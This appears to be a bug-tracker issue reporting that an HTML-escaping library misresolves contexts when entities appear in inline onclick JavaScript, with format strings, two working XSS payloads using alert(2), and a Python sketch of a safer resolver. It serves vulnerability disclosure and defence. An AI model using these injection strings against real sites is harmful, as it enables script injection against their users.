Open tank1st99 opened 6 years ago
The library incorrectly resolves contexts with HTML entities inside the inlined JS code.
False Positive:
Format String: <a href="#" onclick="alert("{0}");">test</a>
Payload: False Positive

XSS 1:
Format String: <a href='#' onclick='alert(""{0}"");'>XSS</a>
Payload: +alert(2)+

XSS 2:
Format String: <a href="#" onclick='alert("Tom&{0}");'>XSS?</a>
Payload: quot;);alert(2);//
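The resolution rule the report depends on, as an added example that is not the library's own code: a browser entity-decodes an event-handler attribute before its JS parser runs, so a context resolver has to decode the static part of the format string first, and an `&` sitting directly before the placeholder must be treated as an unfinished entity rather than literal JS. The functions `resolve_context` and `safe_format`, and the refuse-on-doubt policy, are assumptions made here.

```python
import html
import json
import re

# Format strings quoted from the report; the resolver and safe_format below are
# constructed for this illustration, not the library's own implementation.
FMT1 = '<a href="#" onclick="alert(&quot;{0}&quot;);">test</a>'
FMT2 = "<a href='#' onclick='alert(&quot;&quot;{0}&quot;&quot;);'>XSS</a>"
FMT3 = "<a href=\"#\" onclick='alert(&quot;Tom&{0}&quot;);'>XSS?</a>"
PLACEHOLDER = "{0}"
ATTR_RE = re.compile(r"""onclick=(["'])(.*?)\1""", re.DOTALL)

def resolve_context(fmt):
    """Classify the {0} placeholder as 'js-string', 'js-code' or 'partial-entity'.

    The browser entity-decodes the attribute value before the JS parser sees it,
    so the static text is decoded first and then scanned for an open string.
    """
    m = ATTR_RE.search(fmt)
    if not m or PLACEHOLDER not in m.group(2):
        raise ValueError("placeholder is not inside an onclick attribute")
    raw_prefix = m.group(2).split(PLACEHOLDER, 1)[0]
    # An '&' (optionally followed by entity characters) right before the
    # placeholder can be completed into an entity by the inserted value, so the
    # static part alone does not fix the context (the "Tom&{0}" case).
    if re.search(r"&[#A-Za-z0-9]*$", raw_prefix):
        return "partial-entity"
    js_prefix = html.unescape(raw_prefix)   # what the JS parser actually sees
    quote, i = None, 0
    while i < len(js_prefix):
        c = js_prefix[i]
        if quote:
            if c == "\\":
                i += 1              # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "\"'`":
            quote = c
        i += 1
    return "js-string" if quote else "js-code"

def safe_format(fmt, value):
    """Insert value only where a layered encoding is known to be safe."""
    ctx = resolve_context(fmt)
    if ctx != "js-string":
        raise ValueError("refusing to insert into %s context" % ctx)
    encoded = json.dumps(value)[1:-1]           # JS string-literal escaping (inner layer)
    encoded = html.escape(encoded, quote=True)  # attribute encoding (outer layer)
    return fmt.replace(PLACEHOLDER, encoded, 1)
```

With these rules the first format string resolves to a JS string literal and accepts "False Positive", while the other two are refused because the placeholder lands in JS code or completes an entity.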
The bug is confirmed. Please contact me at vkochetkov@ptsecurity.com to get information on receiving prizes.